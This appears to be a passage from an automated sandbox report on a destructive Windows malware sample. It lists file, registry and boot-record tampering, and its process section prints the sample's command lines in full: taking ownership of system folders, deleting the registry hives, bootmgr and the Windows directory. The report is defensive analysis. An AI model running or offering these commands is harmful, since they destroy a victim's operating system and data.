| File opened for modification | C:\Windows\System32\drivers\usbd.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\beep.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\drmk.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\null.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storahci.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\http.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\i8042prt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mrxsmb.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Ndu.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\RLCC9S~1.SYS | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbehci.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\winhvr.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbport.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dfsc.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hdaudbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidusb.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ksthunk.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdx.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdpbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vhdmp.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\fsdepends.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kbdclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mouhid.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\npsvctrig.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\nsiproxy.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\netbt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Vid.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\bindflt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\bowser.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cimfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\dumpfve.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mpsdrv.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\watchdog.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ahcache.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mmcss.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\netbios.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\storqosflt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\usbhub.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\afd.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\condrv.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\npfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\pacer.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\cdfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\mssmbios.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ndiscap.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tdi.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msfs.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\rdbss.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tcpipreg.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\amdppm.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Diskdump.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidclass.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\kdnic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\ks.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\Rtnic64.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\vwififlt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\csc.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\filecrypt.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\HdAudio.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\hidparse.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\msquic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\srv2.sys | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wintrust.dll | C:\Windows\system32\cmd.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\spool\prtprocs\x64\winprint.dll | C:\Windows\system32\cmd.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Indicator Removal: File Deletion
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\imm32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Cortana.ProxyStub.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Gaming.Input.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\adsldp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\samlib.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\windows.storage.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WinMetadata\Windows.Web.winmd | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\globinputhost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM.LOG1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\lsass.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ngcpopkeysrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\INTERN~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MTF.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\AboveLockAppHost.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\Conhost.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msdelta.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI1C6C~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dhcpcsvc6.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_6649425cdcae9b5f\kdnic.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\hid.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MTFServer.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sbservicetrigger.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\kernel32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\Rtnic64.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\APMon.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\FWPUCLNT.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msasn1.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\PortableDeviceApi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\stdole2.tlb | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Networking.Connectivity.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI4B6B~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MICEDD~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\OALERT~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\svchost.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\SAM.LOG2 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\csrss.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\msutb.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.UI.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dwmredir.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\ntlanman.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\gpsvc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\MSWB7.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\PortableDeviceTypes.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\UiaManager.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\nsi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\rometadata.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.CloudStore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\netprovfw.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\dcomp.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\netmsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\twinui.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\NPSM.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\WlanRadioManager.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\RTWorkQ.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\vssapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Windows.Globalization.Fontgroups.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Chakra.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\twinui.pcshell.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI7771~1.EVT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\wow64.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\config\TxR\{53B39~2.BLF | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\spoolsv.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\en-US\AudioEndpointBuilder.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\winevt\Logs\MI8607~1.EVT | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\WinSxS\AMF487~1.111\afunix.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD64_~4.108\TILEDA~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM79D1~1.128\lsasrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM19E5~1.1_N\negoexts.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2051~1.120\SBSERV~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_da-dk_08e07c485e058eb0\DA-DK_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\AppData\Roaming\MICROS~1\Windows\Recent | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2B4E~1.128\dwmcore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\CCME_B~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMDFE5~1.126\INPUTL~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM80F6~1.123\mrxsmb20.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM8B88~1.1_E\CLIPSV~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2590~1.906\cryptnet.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2DCF~1.610\logoncli.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM6BD9~1.1_N\segoeui.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM180E~1.1_N\segmdl2.ttf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AME828~1.1_E\INPUTS~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_sr-..-rs_3c7b8ddb0a8496f4\SR-LAT~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..ccessagent-binaries_31bf3856ad364e35_10.0.19041.1_none_3802d0d85b60df4c\autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\NTUSER~2.REG | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM747A~1.546\sfc_os.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\adobepdf.xdc | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\COLLEC~1.AAP | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\LOCALS~1\FAVORI~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5D5F~1.1_N\RstrtMgr.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\Checkers.api | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\bootstat.dat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SystemResources\Windows.UI.SettingsAppThreshold\SystemSettings\Assets\Fonts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM039F~1.120\MSKEYP~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5224~1.985\oleaut32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM4D81~1.123\fveapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\BitLockerDiscoveryVolumeContents\ja-JP_BitLockerToGo.exe.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM7C93~1.126\wevtapi.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM0951~1.1_N\lmhsvc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM2915~1.128\fwbase.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\SYMBOL~1.TXT | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_uk-ua_d90616947cd51d4e\UK-UA_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AME830~1.102\WINDOW~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM6434~1.207\sxssrv.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM32A2~1.115\mssrch.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\00006109E70000000100000000F01FEC\16.0.12527\VCCORL~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMC899~1.1_N\null.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMB3A9~1.844\wpncore.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\x86_microsoft-windows-s..-binaries.resources_31bf3856ad364e35_10.0.19041.1_es-es_aec844614ee0e0b4\ES-ES_~1.MUI | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM5C98~1.128\daxexec.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM9F71~1.120\ole32.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMDFE5~1.126\TEXTIN~2.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMA5D4~1.746\WINDOW~1.DLL | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_C9E2~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\FILLSI~1.AAP | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\PDXFIL~1.ICO | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD831~1.1_N\rdpbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD82F~1.115\ClipSVC.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_785C~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\a3dutils.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\PrintDialog\Assets | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AMD024~1.1_N\umbus.sys | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM0FA4~1.1_N\netjoin.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM8F2F~1.546\wmidcom.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1926E8D15D0BCE53481466615F760A7F\10.0.40219\F_4725~1 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\Installer\$PatchCache$\Managed\1D5E3C0FEDA1E123187686FED06E995A\10.0.40219\F_CENT~4 | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM3684~1.108\unsecapp.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\AM962C~1.546\xmllite.dll | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe
"C:\Users\Admin\AppData\Local\Temp\34567c920c1f841bc358af797a1a68a44e2a62bef2681cc4805305a4291ff7a0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Taskkill.exe >nul 2>nul && icacls %windir%\System32\Taskkill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Taskkill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Taskkill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Taskkill.exe >nul 2>nul
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f %windir%\System32\Tskill.exe >nul 2>nul && icacls %windir%\System32\Tskill.exe /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\Tskill.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\Tskill.exe /grant administrators:F
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q %windir%\System32\Tskill.exe >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\*.* >nul 2>nul && icacls %windir%\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c takeown /f %windir%\System32\*.* >nul 2>nul && icacls %windir%\System32\*.* /grant administrators:F >nul 2>nul
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\*.*
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\*.* /grant administrators:F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/* /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/* /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.exe /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.exe /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/exefile /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/exefile /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCR/.dll /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCR/.dll /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKLM/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKLM/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKU/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKU/* /va /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKCC/* /va /f >nul 2>nul
C:\Windows\system32\reg.exe
reg delete HKCC/* /va /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown /f C:\bootmgr >nul 2>nul && icacls C:\bootmgr /grant administrators:F >nul 2>nul && attrib -s -h -r C:\bootmgr
C:\Windows\system32\takeown.exe
takeown /f C:\bootmgr
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /s /f /q C:\bootmgr >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c del /s /f /q /a %windir% >nul 2>nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rd /s /q %windir% >nul 2>nul
Network
| Country | Destination | Domain | Proto |
